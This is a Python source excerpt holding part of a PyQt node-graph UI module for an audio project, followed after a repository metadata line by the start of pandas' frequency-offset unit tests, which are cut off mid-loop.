value_types.Color(0.8, 1.0, 0.8),
value_types.Color(0.9, 1.0, 0.9),
value_types.Color(0.6, 0.6, 1.0),
value_types.Color(0.7, 0.7, 1.0),
value_types.Color(0.8, 0.8, 1.0),
value_types.Color(0.9, 0.9, 1.0),
value_types.Color(1.0, 0.6, 1.0),
value_types.Color(1.0, 0.7, 1.0),
value_types.Color(1.0, 0.8, 1.0),
value_types.Color(1.0, 0.9, 1.0),
value_types.Color(1.0, 1.0, 0.6),
value_types.Color(1.0, 1.0, 0.7),
value_types.Color(1.0, 1.0, 0.8),
value_types.Color(1.0, 1.0, 0.9),
value_types.Color(0.6, 1.0, 1.0),
value_types.Color(0.7, 1.0, 1.0),
value_types.Color(0.8, 1.0, 1.0),
value_types.Color(0.9, 1.0, 1.0),
]
def __init__(self, *, action: SelectColorAction, **kwargs: Any) -> None:
super().__init__(**kwargs)
self.__action = action
layout = QtWidgets.QGridLayout()
layout.setContentsMargins(QtCore.QMargins(2, 2, 2, 2))
layout.setSpacing(2)
self.setLayout(layout)
for idx, color in enumerate(self.colors):
w = ColorBox(color, self)
w.clicked.connect(functools.partial(self.__action.colorSelected.emit, color))
layout.addWidget(w, idx // 8, idx % 8)
class NodeProps(QtCore.QObject):
contentRectChanged = QtCore.pyqtSignal(QtCore.QRectF)
canvasLayoutChanged = QtCore.pyqtSignal()
class Title(QtWidgets.QGraphicsSimpleTextItem):
def __init__(self, name: str, parent: 'Node') -> None:
super().__init__(parent)
self.setText(name)
self.setFlag(QtWidgets.QGraphicsItem.ItemClipsToShape, True)
self.setAcceptedMouseButtons(Qt.LeftButton)
self.__width = None # type: float
def boundingRect(self) -> QtCore.QRectF:
bounding_rect = super().boundingRect()
if self.__width is not None:
bounding_rect.setWidth(self.__width)
return bounding_rect
def shape(self) -> QtGui.QPainterPath:
shape = QtGui.QPainterPath()
shape.addRect(self.boundingRect())
return shape
def setWidth(self, width: float) -> None:
self.__width = width
class Box(QtWidgets.QGraphicsPathItem):
def mousePressEvent(self, event: QtWidgets.QGraphicsSceneMouseEvent) -> None:
# swallow mouse press events (which aren't handled by some other of the
# node's items) to prevent the canvas from triggering a rubber band
# selection.
event.accept()
class NodeIcon(QtWidgets.QGraphicsItem):
def __init__(self, icon: QtSvg.QSvgRenderer, parent: QtWidgets.QGraphicsItem) -> None:
super().__init__(parent)
self.__icon = icon
self.__size = QtCore.QSizeF()
self.__pixmap = None # type: QtGui.QPixmap
def setRect(self, rect: QtCore.QRectF) -> None:
self.prepareGeometryChange()
self.setPos(rect.topLeft())
self.__size = rect.size()
def boundingRect(self) -> QtCore.QRectF:
return QtCore.QRectF(QtCore.QPointF(), self.__size)
def paint(
self, painter: QtGui.QPainter, option: QtWidgets.QStyleOptionGraphicsItem,
widget: Optional[QtWidgets.QWidget] = None) -> None:
size = min(self.__size.width(), self.__size.height())
size = int(size - 0.4 * max(0, size - 50))
if size < 10:
return
pixmap_size = QtCore.QSize(size, size)
if self.__pixmap is None or self.__pixmap.size() != pixmap_size:
self.__pixmap = QtGui.QPixmap(pixmap_size)
self.__pixmap.fill(QtGui.QColor(0, 0, 0, 0))
pixmap_painter = QtGui.QPainter(self.__pixmap)
try:
self.__icon.render(pixmap_painter, QtCore.QRectF(0, 0, size, size))
finally:
pixmap_painter.end()
painter.setOpacity(min(0.8, max(0.2, 0.8 - (size - 30) / 100)))
painter.drawPixmap(
int((self.__size.width() - size) / 2),
int((self.__size.height() - size) / 2),
self.__pixmap)
class PortLabel(QtWidgets.QGraphicsRectItem):
def __init__(self, port: 'Port') -> None:
super().__init__()
self.setZValue(100000)
self.__text = QtWidgets.QGraphicsSimpleTextItem(self)
tooltip = '%s: ' % port.name()
tooltip += '/'.join(
{
node_db.PortDescription.AUDIO: "audio",
node_db.PortDescription.KRATE_CONTROL: "k-rate control",
node_db.PortDescription.ARATE_CONTROL: "a-rate control",
node_db.PortDescription.EVENTS: "event",
}[port_type]
for port_type in port.possible_types())
tooltip += {
node_db.PortDescription.INPUT: " input",
node_db.PortDescription.OUTPUT: " output",
}[port.direction()]
self.__text.setText(tooltip)
self.__text.setPos(4, 2)
text_box = self.__text.boundingRect()
pen = QtGui.QPen()
pen.setColor(Qt.black)
pen.setWidth(1)
self.setPen(pen)
self.setBrush(QtGui.QColor(255, 255, 200))
self.setRect(0, 0, text_box.width() + 8, text_box.height() + 4)
class Port(QtWidgets.QGraphicsPathItem):
def __init__(self, port_desc: node_db.PortDescription, parent: 'Node') -> None:
super().__init__(parent)
self.__desc = port_desc
self.__node = parent.node()
self.__listeners = core.ListenerList()
self.__listeners.add(
self.__node.connections_changed.add(lambda _: self.__update()))
self.__target_type = None # type: node_db.PortDescription.Type
self.__highlighted = False
self.__tooltip = None # type: PortLabel
def setup(self) -> None:
self.__tooltip = PortLabel(self)
self.scene().addItem(self.__tooltip)
self.__update()
def cleanup(self) -> None:
if self.__tooltip is not None:
self.scene().removeItem(self.__tooltip)
self.__tooltip = None
self.__listeners.cleanup()
def name(self) -> str:
return self.__desc.name
def direction(self) -> node_db.PortDescription.Direction:
return self.__desc.direction
def current_type(self) -> node_db.PortDescription.Type:
return self.__node.get_current_port_type(self.__desc.name)
def possible_types(self) -> List['node_db.PortDescription.Type']:
return self.__node.get_possible_port_types(self.__desc.name)
def node(self) -> 'Node':
return cast(Node, self.parentItem())
def highlighted(self) -> bool:
return self.__highlighted
def setHighlighted(self, highlighted: bool) -> None:
self.__highlighted = highlighted
self.__update()
def setTargetType(self, target_type: node_db.PortDescription.Type) -> None:
if self.__target_type == target_type:
return
self.__target_type = target_type
self.__update()
def clearTargetType(self) -> None:
if self.__target_type is None:
return
self.__target_type = None
self.__update()
def canConnectTo(self, port: 'Port') -> bool:
return music.can_connect_ports(
self.__node, self.__desc.name,
port.__node, port.__desc.name)
def preferredConnectionType(self, port: 'Port') -> node_db.PortDescription.Type:
return music.get_preferred_connection_type(
self.__node, self.__desc.name,
port.__node, port.__desc.name)
def handleScenePos(self) -> QtCore.QPointF:
if not self.isVisible():
return self.scenePos()
elif self.__desc.direction == node_db.PortDescription.INPUT:
return self.scenePos() + QtCore.QPointF(-10, 0)
else:
return self.scenePos() + QtCore.QPointF(10, 0)
def descriptionChanged(self, port_desc: node_db.PortDescription) -> None:
self.__desc = port_desc
self.__update()
def __update(self) -> None:
color = port_colors[self.__target_type or self.current_type()]
if self.__highlighted:
self.setOpacity(1.0)
self.__tooltip.setVisible(self.__highlighted)
ttpos = self.scenePos()
ttpos += QtCore.QPointF(0, -self.__tooltip.boundingRect().height() / 2)
if self.__desc.direction == node_db.PortDescription.OUTPUT:
ttpos += QtCore.QPointF(20, 0)
else:
ttpos -= QtCore.QPointF(20 + self.__tooltip.boundingRect().width(), 0)
self.__tooltip.setPos(ttpos)
else:
self.setOpacity(0.7)
self.__tooltip.setVisible(False)
if self.__highlighted or self.__target_type is not None:
pen = QtGui.QPen()
pen.setColor(Qt.red)
pen.setWidth(2)
self.setPen(pen)
self.setBrush(color)
rect = QtCore.QRectF(-15, -12, 30, 24)
else:
pen = QtGui.QPen()
pen.setColor(QtGui.QColor(80, 80, 200))
pen.setWidth(1)
self.setPen(pen)
self.setBrush(color)
rect = QtCore.QRectF(-10, -8, 20, 16)
path = QtGui.QPainterPath()
if self.__desc.direction == node_db.PortDescription.INPUT:
path.moveTo(0, rect.top())
path.arcTo(rect, 90, 180)
else:
path.moveTo(0, rect.top())
path.arcTo(rect, 90, -180)
self.setPath(path)
class Node(ui_base.ProjectMixin, core.AutoCleanupMixin, QtWidgets.QGraphicsItem):
__next_zvalue = 2.0
has_window = False
def __init__(
self, *,
node: music.BaseNode,
icon: Optional[QtSvg.QSvgRenderer] = None,
**kwargs: Any
) -> None:
super().__init__(**kwargs)
self.setZValue(1.0)
self.setAcceptHoverEvents(True)
self.setAcceptedMouseButtons(Qt.LeftButton)
self.props = NodeProps()
self.__session_prefix = 'node/%016x/' % node.id
self.__listeners = core.ListenerList()
self.add_cleanup_function(self.__listeners.cleanup)
self.__node = node
self.__window = None # type: QtWidgets.QWidget
self.__box = Box(self)
if icon is not None:
self.__icon = NodeIcon(icon, self)
else:
self.__icon = None
self.__ports = {} # type: Dict[str, Port]
for port_desc in self.__node.description.ports:
port = Port(port_desc, self)
self.__ports[port_desc.name] = port
self.__title = Title(self.__node.name, self)
self.__title_edit = QtWidgets.QLineEdit()
self.__title_edit.editingFinished.connect(self.__renameNodeFinished)
self.__title_edit_proxy = QtWidgets.QGraphicsProxyWidget(self)
self.__title_edit_proxy.setWidget(self.__title_edit)
self.__title_widgets_proxy = None
self.__title_widgets_container = None
title_widgets = list(self.titleWidgets())
if title_widgets:
self.__title_widgets_container = QtWidgets.QWidget()
self.__title_widgets_container.setAutoFillBackground(False)
self.__title_widgets_container.setAttribute(Qt.WA_NoSystemBackground, True)
layout = QtWidgets.QHBoxLayout()
layout.setContentsMargins(0, 0, 0, 0)
layout.setSpacing(1)
for widget in title_widgets:
layout.addWidget(widget)
self.__title_widgets_container.setLayout(layout)
self.__title_widgets_proxy = QtWidgets.QGraphicsProxyWidget(self)
self.__title_widgets_proxy.setWidget(self.__title_widgets_container)
self.__body_proxy = None # type: QtWidgets.QGraphicsProxyWidget
self.__body = self.createBodyWidget()
if self.__body is not None:
self.__body.setAutoFillBackground(False)
self.__body.setAttribute(Qt.WA_NoSystemBackground, True)
self.__body_proxy = QtWidgets.QGraphicsProxyWidget(self)
self.__body_proxy.setWidget(self.__body)
self.__transform = QtGui.QTransform()
self.__canvas_rect = self.__transform.mapRect(self.contentRect())
self.__selected = False
self.__hovered = False
self.__rename_node = False
self.__drag_rect = QtCore.QRectF()
self.__listeners.add(
self.__node.name_changed.add(self.__nameChanged))
self.__listeners.add(
self.__node.graph_pos_changed.add(self.__graphRectChanged))
self.__listeners.add(
self.__node.graph_size_changed.add(self.__graphRectChanged))
self.__listeners.add(
self.__node.graph_color_changed.add(lambda *_: self.__updateState()))
self.__listeners.add(
self.__node.port_properties_changed.add(lambda *_: self.__layout()))
self.__listeners.add(
self.__node.description_changed.add(lambda *_: self.__descriptionChanged()))
self.__state = None # type: audioproc.NodeStateChange.State
self.__listeners.add(
self.audioproc_client.node_state_changed.add(
'%08x' % self.__node.id, self.__stateChanged))
self.__updateState()
def __str__(self) -> str:
        return '<node name=%r>' % self.__node.name
@property
def __in_ports(self) -> List[node_db.PortDescription]:
return [
port_desc for port_desc in self.__node.description.ports
if port_desc.direction == node_db.PortDescription.INPUT
]
@property
def __out_ports(self) -> List[node_db.PortDescription]:
return [
port_desc for port_desc in self.__node.description.ports
if port_desc.direction == node_db.PortDescription.OUTPUT
]
def __nameChanged(self, *args: Any) -> None:
self.__title.setText(self.__node.name)
def __graphRectChanged(self, *args: Any) -> None:
self.__canvas_rect = self.__transform.mapRect(self.contentRect())
self.__layout()
self.props.contentRectChanged.emit(self.contentRect())
def createBodyWidget(self) -> QtWidgets.QWidget:
return None
def createWindow(self, **kwargs: Any) -> QtWidgets.QWidget:
raise RuntimeError("Node %s does not support windows." % type(self).__name__)
def titleWidgets(self) -> Iterable[QtWidgets.QWidget]:
if self.__node.description.node_ui.muteable:
muted_button = mute_button.MuteButton()
muted_button.toggled.connect(
lambda muted: self.project_client.set_session_value(
self.__session_prefix + 'muted', muted))
muted_button.setChecked(
self.project_client.get_session_value(
self.__session_prefix + 'muted', False))
self.project_client.add_session_data_listener(
self.__session_prefix + 'muted', muted_button.setChecked)
yield muted_button
if self.__node.removable:
remove_button = QtWidgets.QToolButton()
remove_button.setAutoRaise(True)
remove_button.setIcon(QtGui.QIcon(
os.path.join(constants.DATA_DIR, 'icons', 'window-close.svg')))
remove_button.clicked.connect(self.onRemove)
yield remove_button
def setup(self) -> None:
for port in self.__ports.values():
port.setup()
def cleanup(self) -> None:
for port in self.__ports.values():
port.cleanup()
self.__ports.clear()
if self.__window is not None:
self.__window.close()
self.__window = None
super().cleanup()
def node(self) -> music.BaseNode:
return self.__node
def id(self) -> int:
return self.__node.id
def name(self) -> str:
return self.__node.name
def graph_pos(self) -> value_types.Pos2F:
return self.__node.graph_pos
def graph_size(self) -> value_types.SizeF:
return self.__node.graph_size
def ports(self) -> Iterable[Port]:
for port_desc in self.__node.description.ports:
yield self.__ports[port_desc.name]
def upstream_nodes(self) -> List[music.BaseNode]:
return self.__node.upstream_nodes()
def selected(self) -> bool:
return self.__selected
def setSelected(self, selected: bool) -> None:
self.__selected = selected
self.__updateState()
def port(self, port_name: str) -> Port:
return self.__ports[port_name]
def portHandleScenePos(self, port_name: str) -> QtCore.QPointF:
return self.__ports[port_name].handleScenePos()
def contentTopLeft(self) -> QtCore.QPointF:
return QtCore.QPointF(self.__node.graph_pos.x, self.__node.graph_pos.y)
def contentSize(self) -> QtCore.QSizeF:
return QtCore.QSizeF(self.__node.graph_size.width, self.__node.graph_size.height)
def contentRect(self) -> QtCore.QRectF:
return QtCore.QRectF(self.contentTopLeft(), self.contentSize())
def canvasTopLeft(self) -> QtCore.QPointF:
return self.__canvas_rect.topLeft()
def setCanvasTopLeft(self, pos: QtCore.QPointF) -> None:
self.__canvas_rect.moveTopLeft(pos)
self.__layout()
def setCanvasRect(self, rect: QtCore.QRectF) -> None:
self.__canvas_rect = rect
self.__layout()
def canvasRect(self) -> QtCore.QRectF:
return self.__canvas_rect
def setCanvasTransform(self, transform: QtGui.QTransform) -> None:
self.__transform = transform
self.__canvas_rect = self.__transform.mapRect(self.contentRect())
self.__layout()
def resizeSide(self, pos: QtCore.QPointF) -> Optional[str]:
t = self.__canvas_rect.top()
b = self.__canvas_rect.bottom()
l = self.__canvas_rect.left()
r = self.__canvas_rect.right()
w = self.__canvas_rect.width()
h = self.__canvas_rect.height()
resize_rects = {
'top': QtCore.QRectF(l + 4, t, w - 8, 4),
'bottom': QtCore.QRectF(l + 10, b - 10, w - 20, 10),
'left': QtCore.QRectF(l, t + 4, 4, h - 14),
'right': QtCore.QRectF(r - 4, t + 4, 4, h - 14),
'topleft': QtCore.QRectF(l, t, 4, 4),
'topright': QtCore.QRectF(r - 4, t, 4, 4),
'bottomleft': QtCore.QRectF(l, b - 10, 10, 10),
'bottomright': QtCore.QRectF(r - 10, b - 10, 10, 10),
}
for side, rect in resize_rects.items():
if rect.contains(pos):
return side
return None
def dragRect(self) -> QtCore.QRectF:
return self.__drag_rect
def boundingRect(self) -> QtCore.QRectF:
return self.__box.boundingRect()
def __descriptionChanged(self) -> None:
ports = {}
for port_desc in self.__node.description.ports:
if port_desc.name not in self.__ports:
port = Port(port_desc, self)
port.setup()
else:
port = self.__ports[port_desc.name]
port.descriptionChanged(port_desc)
ports[port_desc.name] = port
for port_name, port in self.__ports.items():
if port_name not in ports:
port.cleanup()
port.setParentItem(None)
self.scene().removeItem(port)
self.__ports = ports
self.__layout()
def __stateChanged(self, state_change: audioproc.NodeStateChange) -> None:
if state_change.HasField('state'):
self.__state = state_change.state
self.__updateState()
def __updateState(self) -> None:
if self.__selected or self.__hovered:
opacity = 1.0
else:
opacity = 0.7
self.__box.setOpacity(opacity)
for port in self.__ports.values():
if not port.highlighted():
port.setOpacity(opacity)
if self.__state == audioproc.NodeStateChange.BROKEN:
pen = QtGui.QPen()
pen.setColor(Qt.black)
pen.setWidth(2)
self.__box.setPen(pen)
self.__box.setBrush(QtGui.QColor(255, 0, 0))
elif self.__selected:
pen = QtGui.QPen()
pen.setColor(QtGui.QColor(80, 80, 200))
pen.setWidth(2)
self.__box.setPen(pen)
self.__box.setBrush(QtGui.QColor(150, 150, 255))
else:
pen = QtGui.QPen()
pen.setColor(Qt.black)
pen.setWidth(2)
self.__box.setPen(pen)
self.__box.setBrush(QtGui.QColor.fromRgbF(
self.__node.graph_color.r,
self.__node.graph_color.g,
self.__node.graph_color.b,
self.__node.graph_color.a))
def __layout(self) -> None:
self.setPos(self.__canvas_rect.topLeft())
w, h = self.__canvas_rect.width(), self.__canvas_rect.height()
path = QtGui.QPainterPath()
path.addRoundedRect(0, 0, w, h, 5, 5)
self.__box.setPath(path)
visible_in_ports = []
for desc in self.__in_ports:
port_properties = self.__node.get_port_properties(desc.name)
if not port_properties.exposed:
port = self.__ports[desc.name]
port.setVisible(False)
continue
visible_in_ports.append(desc)
show_ports = (0.5 * h > 10 * max(len(visible_in_ports), len(self.__out_ports)))
for idx, desc in enumerate(visible_in_ports):
port = self.__ports[desc.name]
if len(visible_in_ports) > 1:
y = h * (0.5 * idx / (len(visible_in_ports) - 1) + 0.25)
else:
y = h * 0.5
port.setPos(0, y)
port.setVisible(show_ports)
for idx, desc in enumerate(self.__out_ports):
port = self.__ports[desc.name]
if len(self.__out_ports) > 1:
y = h * (0.5 * idx / (len(self.__out_ports) - 1) + 0.25)
else:
y = h * 0.5
port.setPos(w, y)
port.setVisible(show_ports)
if self.__rename_node:
title_h = self.__title_edit_proxy.minimumHeight() + 4
self.__title_edit_proxy.setVisible(True)
self.__title_edit_proxy.setPos(4, 4)
self.__title_edit_proxy.resize(w - 8, self.__title_edit_proxy.minimumHeight())
else:
title_h = 24
self.__title_edit_proxy.setVisible(False)
if self.__title_widgets_proxy is not None:
if (h > self.__title_widgets_container.height() + 2
and w > self.__title_widgets_container.width() + 40
and not self.__rename_node):
self.__title_widgets_proxy.setVisible(True)
self.__title_widgets_proxy.setPos(
w - self.__title_widgets_container.width() - 4, 2)
title_h = self.__title_widgets_container.height() + 4
else:
self.__title_widgets_proxy.setVisible(False)
if h > 20 and not self.__rename_node:
self.__title.setVisible(True)
self.__title.setPos(8, (title_h - 2 - self.__title.boundingRect().height()) / 2)
if self.__title_widgets_proxy is not None and self.__title_widgets_proxy.isVisible():
self.__title.setWidth(self.__title_widgets_proxy.pos().x() - 8)
else:
self.__title.setWidth(w - 16)
else:
self.__title.setVisible(False)
if self.__icon is not None:
if self.__title.isVisible():
icon_y = 24
else:
icon_y = 3
self.__icon.setRect(QtCore.QRectF(3, icon_y, w - 6, h - icon_y - 6))
if self.__body_proxy is not None:
bsize = self.__body_proxy.minimumSize()
if h > bsize.height() + (title_h + 4) and w > bsize.width() + 8:
self.__body_proxy.setVisible(True)
self.__body_proxy.setPos(4, title_h)
self.__body_proxy.resize(w - 8, h - (title_h + 4))
else:
self.__body_proxy.setVisible(False)
if self.__title_edit_proxy.isVisible():
drag_rect_width, drag_rect_height = 0.0, 0.0
else:
if self.__body_proxy is not None and self.__body_proxy.isVisible():
drag_rect_height = title_h
else:
drag_rect_height = h
if self.__title_widgets_proxy is not None and self.__title_widgets_proxy.isVisible():
drag_rect_width = self.__title_widgets_proxy.pos().x()
else:
drag_rect_width = w
self.__drag_rect = QtCore.QRectF(0, 0, drag_rect_width, drag_rect_height)
self.props.canvasLayoutChanged.emit()
def paint(
self, painter: QtGui.QPainter, option: QtWidgets.QStyleOptionGraphicsItem,
widget: Optional[QtWidgets.QWidget] = None) -> None:
pass
def mousePressEvent(self, event: QtWidgets.QGraphicsSceneMouseEvent) -> None:
self.setZValue(Node.__next_zvalue)
Node.__next_zvalue += 1
event.ignore()
super().mousePressEvent(event)
def hoverEnterEvent(self, event: QtWidgets.QGraphicsSceneHoverEvent) -> None:
self.__hovered = True
self.__updateState()
return super().hoverEnterEvent(event)
def hoverLeaveEvent(self, event: QtWidgets.QGraphicsSceneHoverEvent) -> None:
self.__hovered = False
self.__updateState()
return super().hoverLeaveEvent(event)
def buildContextMenu(self, menu: QtWidgets.QMenu) -> None:
if self.has_window:
show_window = menu.addAction("Open in window")
show_window.triggered.connect(self.onShowWindow)
if self.__node.removable:
remove = menu.addAction("Remove")
remove.triggered.connect(self.onRemove)
rename = menu.addAction("Rename")
rename.triggered.connect(self.renameNode)
color_menu = menu.addMenu("Set color")
color_action = SelectColorAction(color_menu)
color_action.colorSelected.connect(self.onSetColor)
color_menu.addAction(color_action)
def onShowWindow(self) -> None:
if self.__window is None:
self.__window = self.createWindow(parent=self.project_view)
self.__window.show()
self.__window.raise_()
self.__window.activateWindow()
def onRemove(self) -> None:
with self.project.apply_mutations('Remove node %s' % self.__node.name):
for conn in self.__node.connections:
self.project.remove_node_connection(conn)
self.project.remove_node(self.__node)
def onSetColor(self, color: value_types.Color) -> None:
if color != self.__node.graph_color:
with self.project.apply_mutations('%s: Set color' % self.__node.name):
self.__node.graph_color = color
def renameNode(self) -> None:
self.__rename_node = True
self.__title_edit.setText(self.__node.name)
self.__title_edit.setFocus()
self.__title_edit.selectAll()
self.__layout()
def __renameNodeFinished(self) -> None:
new_name = self.__title_edit.text()
if new_name != self.__node.name:
self.__title.setText(self.__node.name)
with self.project.apply_mutations('%s: Rename to "%s"' % (self.__node.name, new_name)):
self.__node.name = new_name
self.__rename_node = False
self.__layout()
class Connection(ui_base.ProjectMixin, QtWidgets.QGraphicsPathItem):
def __init__(
self, *,
connection: music.NodeConnection,
src_node: Node,
dest_node: Node,
**kwargs: Any) -> None:
super().__init__(**kwargs)
self.__connection = connection
self.__src_node = src_node
self.__dest_node = dest_node
self.__highlighted = False
self.__src_node_canvas_layout_changed_connection = \
self.__src_node.props.canvasLayoutChanged.connect(self.__update)
self.__dest_node_canvas_layout_changed_connection = \
self.__dest_node.props.canvasLayoutChanged.connect(self.__update)
self.__update()
def cleanup(self) -> None:
if self.__src_node_canvas_layout_changed_connection is not None:
self.__src_node.props.canvasLayoutChanged.disconnect(
self.__src_node_canvas_layout_changed_connection)
self.__src_node_canvas_layout_changed_connection = None
if self.__dest_node_canvas_layout_changed_connection is not None:
self.__dest_node.props.canvasLayoutChanged.disconnect(
self.__dest_node_canvas_layout_changed_connection)
self.__dest_node_canvas_layout_changed_connection = None
def connection(self) -> music.NodeConnection:
return self.__connection
def id(self) -> int:
return self.__connection.id
def src_node(self) -> Node:
return self.__src_node
def src_port(self) -> Port:
return self.__src_node.port(self.__connection.source_port)
def dest_node(self) -> Node:
return self.__dest_node
def dest_port(self) -> Port:
return self.__dest_node.port(self.__connection.dest_port)
def setHighlighted(self, highlighted: bool) -> None:
self.__highlighted = highlighted
self.__update()
def __update(self) -> None:
color = port_colors[self.__connection.type]
if self.__highlighted:
pen = QtGui.QPen()
pen.setColor(color)
pen.setWidth(4)
self.setPen(pen)
else:
pen = QtGui.QPen()
pen.setColor(color)
pen.setWidth(2)
self.setPen(pen)
pos1 = self.__src_node.portHandleScenePos(self.__connection.source_port)
pos2 = self.__dest_node.portHandleScenePos(self.__connection.dest_port)
cpos = QtCore.QPointF(min(100, abs(pos2.x() - pos1.x()) / 2), 0)
path = QtGui.QPainterPath()
path.moveTo(pos1)
path.cubicTo(pos1 + cpos, pos2 - cpos, pos2)
self.setPath(path)
| gpl-2.0 | 6,715,687,354,517,147,000 | 33.472672 | 99 | 0.580023 | false |
GuessWhoSamFoo/pandas | pandas/tests/tseries/test_frequencies.py | 1 | 29684 | from datetime import datetime, timedelta
import numpy as np
import pytest
from pandas._libs.tslibs import frequencies as libfrequencies, resolution
from pandas._libs.tslibs.ccalendar import MONTHS
from pandas._libs.tslibs.frequencies import (
INVALID_FREQ_ERR_MSG, FreqGroup, _period_code_map, get_freq, get_freq_code)
import pandas.compat as compat
from pandas.compat import is_platform_windows, range
from pandas import (
DatetimeIndex, Index, Series, Timedelta, Timestamp, date_range,
period_range)
from pandas.core.tools.datetimes import to_datetime
import pandas.util.testing as tm
import pandas.tseries.frequencies as frequencies
import pandas.tseries.offsets as offsets
class TestToOffset(object):
def test_to_offset_multiple(self):
freqstr = '2h30min'
freqstr2 = '2h 30min'
result = frequencies.to_offset(freqstr)
assert (result == frequencies.to_offset(freqstr2))
expected = offsets.Minute(150)
assert (result == expected)
freqstr = '2h30min15s'
result = frequencies.to_offset(freqstr)
expected = offsets.Second(150 * 60 + 15)
assert (result == expected)
freqstr = '2h 60min'
result = frequencies.to_offset(freqstr)
expected = offsets.Hour(3)
assert (result == expected)
freqstr = '2h 20.5min'
result = frequencies.to_offset(freqstr)
expected = offsets.Second(8430)
assert (result == expected)
freqstr = '1.5min'
result = frequencies.to_offset(freqstr)
expected = offsets.Second(90)
assert (result == expected)
freqstr = '0.5S'
result = frequencies.to_offset(freqstr)
expected = offsets.Milli(500)
assert (result == expected)
freqstr = '15l500u'
result = frequencies.to_offset(freqstr)
expected = offsets.Micro(15500)
assert (result == expected)
freqstr = '10s75L'
result = frequencies.to_offset(freqstr)
expected = offsets.Milli(10075)
assert (result == expected)
freqstr = '1s0.25ms'
result = frequencies.to_offset(freqstr)
expected = offsets.Micro(1000250)
assert (result == expected)
freqstr = '1s0.25L'
result = frequencies.to_offset(freqstr)
expected = offsets.Micro(1000250)
assert (result == expected)
freqstr = '2800N'
result = frequencies.to_offset(freqstr)
expected = offsets.Nano(2800)
assert (result == expected)
freqstr = '2SM'
result = frequencies.to_offset(freqstr)
expected = offsets.SemiMonthEnd(2)
assert (result == expected)
freqstr = '2SM-16'
result = frequencies.to_offset(freqstr)
expected = offsets.SemiMonthEnd(2, day_of_month=16)
assert (result == expected)
freqstr = '2SMS-14'
result = frequencies.to_offset(freqstr)
expected = offsets.SemiMonthBegin(2, day_of_month=14)
assert (result == expected)
freqstr = '2SMS-15'
result = frequencies.to_offset(freqstr)
expected = offsets.SemiMonthBegin(2)
assert (result == expected)
# malformed
with pytest.raises(ValueError, match='Invalid frequency: 2h20m'):
frequencies.to_offset('2h20m')
def test_to_offset_negative(self):
freqstr = '-1S'
result = frequencies.to_offset(freqstr)
assert (result.n == -1)
freqstr = '-5min10s'
result = frequencies.to_offset(freqstr)
assert (result.n == -310)
freqstr = '-2SM'
result = frequencies.to_offset(freqstr)
assert (result.n == -2)
freqstr = '-1SMS'
result = frequencies.to_offset(freqstr)
assert (result.n == -1)
def test_to_offset_invalid(self):
# GH 13930
with pytest.raises(ValueError, match='Invalid frequency: U1'):
frequencies.to_offset('U1')
with pytest.raises(ValueError, match='Invalid frequency: -U'):
frequencies.to_offset('-U')
with pytest.raises(ValueError, match='Invalid frequency: 3U1'):
frequencies.to_offset('3U1')
with pytest.raises(ValueError, match='Invalid frequency: -2-3U'):
frequencies.to_offset('-2-3U')
with pytest.raises(ValueError, match='Invalid frequency: -2D:3H'):
frequencies.to_offset('-2D:3H')
with pytest.raises(ValueError, match='Invalid frequency: 1.5.0S'):
frequencies.to_offset('1.5.0S')
# split offsets with spaces are valid
assert frequencies.to_offset('2D 3H') == offsets.Hour(51)
assert frequencies.to_offset('2 D3 H') == offsets.Hour(51)
assert frequencies.to_offset('2 D 3 H') == offsets.Hour(51)
assert frequencies.to_offset(' 2 D 3 H ') == offsets.Hour(51)
assert frequencies.to_offset(' H ') == offsets.Hour()
assert frequencies.to_offset(' 3 H ') == offsets.Hour(3)
# special cases
assert frequencies.to_offset('2SMS-15') == offsets.SemiMonthBegin(2)
with pytest.raises(ValueError, match='Invalid frequency: 2SMS-15-15'):
frequencies.to_offset('2SMS-15-15')
with pytest.raises(ValueError, match='Invalid frequency: 2SMS-15D'):
frequencies.to_offset('2SMS-15D')
def test_to_offset_leading_zero(self):
freqstr = '00H 00T 01S'
result = frequencies.to_offset(freqstr)
assert (result.n == 1)
freqstr = '-00H 03T 14S'
result = frequencies.to_offset(freqstr)
assert (result.n == -194)
def test_to_offset_leading_plus(self):
freqstr = '+1d'
result = frequencies.to_offset(freqstr)
assert (result.n == 1)
freqstr = '+2h30min'
result = frequencies.to_offset(freqstr)
assert (result.n == 150)
for bad_freq in ['+-1d', '-+1h', '+1', '-7', '+d', '-m']:
with pytest.raises(ValueError, match='Invalid frequency:'):
frequencies.to_offset(bad_freq)
def test_to_offset_pd_timedelta(self):
# Tests for #9064
td = Timedelta(days=1, seconds=1)
result = frequencies.to_offset(td)
expected = offsets.Second(86401)
assert (expected == result)
td = Timedelta(days=-1, seconds=1)
result = frequencies.to_offset(td)
expected = offsets.Second(-86399)
assert (expected == result)
td = Timedelta(hours=1, minutes=10)
result = frequencies.to_offset(td)
expected = offsets.Minute(70)
assert (expected == result)
td = Timedelta(hours=1, minutes=-10)
result = frequencies.to_offset(td)
expected = offsets.Minute(50)
assert (expected == result)
td = Timedelta(weeks=1)
result = frequencies.to_offset(td)
expected = offsets.Day(7)
assert (expected == result)
td1 = Timedelta(hours=1)
result1 = frequencies.to_offset(td1)
result2 = frequencies.to_offset('60min')
assert (result1 == result2)
td = Timedelta(microseconds=1)
result = frequencies.to_offset(td)
expected = offsets.Micro(1)
assert (expected == result)
td = Timedelta(microseconds=0)
pytest.raises(ValueError, lambda: frequencies.to_offset(td))
def test_anchored_shortcuts(self):
result = frequencies.to_offset('W')
expected = frequencies.to_offset('W-SUN')
assert (result == expected)
result1 = frequencies.to_offset('Q')
result2 = frequencies.to_offset('Q-DEC')
expected = offsets.QuarterEnd(startingMonth=12)
assert (result1 == expected)
assert (result2 == expected)
result1 = frequencies.to_offset('Q-MAY')
expected = offsets.QuarterEnd(startingMonth=5)
assert (result1 == expected)
result1 = frequencies.to_offset('SM')
result2 = frequencies.to_offset('SM-15')
expected = offsets.SemiMonthEnd(day_of_month=15)
assert (result1 == expected)
assert (result2 == expected)
result = frequencies.to_offset('SM-1')
expected = offsets.SemiMonthEnd(day_of_month=1)
assert (result == expected)
result = frequencies.to_offset('SM-27')
expected = offsets.SemiMonthEnd(day_of_month=27)
assert (result == expected)
result = frequencies.to_offset('SMS-2')
expected = offsets.SemiMonthBegin(day_of_month=2)
assert (result == expected)
result = frequencies.to_offset('SMS-27')
expected = offsets.SemiMonthBegin(day_of_month=27)
assert (result == expected)
# ensure invalid cases fail as expected
invalid_anchors = ['SM-0', 'SM-28', 'SM-29',
'SM-FOO', 'BSM', 'SM--1',
'SMS-1', 'SMS-28', 'SMS-30',
                           'SMS-BAR', 'SMS-BYR', 'BSMS',
'SMS--2']
for invalid_anchor in invalid_anchors:
